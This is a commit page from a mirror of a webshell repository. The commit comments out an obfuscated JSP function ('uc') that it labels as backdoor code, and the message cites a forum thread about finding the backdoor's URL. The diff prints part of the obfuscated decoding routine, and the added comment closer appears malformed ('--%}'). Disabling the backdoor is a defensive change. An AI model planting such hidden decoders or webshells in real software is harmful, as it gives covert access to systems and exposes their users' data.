mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
annotation backdoor code
find backdoor url: https://bbs.ichunqiu.com/thread-32681-1-1.html
This commit is contained in:
parent
28ee657831
commit
a14f0ca077
1 changed files with 2 additions and 2 deletions
|
@ -273,7 +273,7 @@ s += SysInfo.charAt(i);
|
|||
}
|
||||
return s;
|
||||
}
|
||||
public static String uc(String str)
|
||||
<%-- public static String uc(String str)
|
||||
{
|
||||
String c="\n\r"; long d=127, f=11, j=12, h=14, m=31, r=83, k=1, n=8, s=114, u=-5, v=5,a=0;
|
||||
StringBuffer sb = new StringBuffer();
|
||||
|
@ -291,7 +291,7 @@ for (int i = 0; i < ch.length; i++) {
|
|||
sb.append((char)a);
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
} --%}
|
||||
private static int connectTimeOut = 5000;
|
||||
private static int readTimeOut = 10000;
|
||||
private static String requestEncoding = "GBK";
|
||||
|
|
Loading…
Reference in a new issue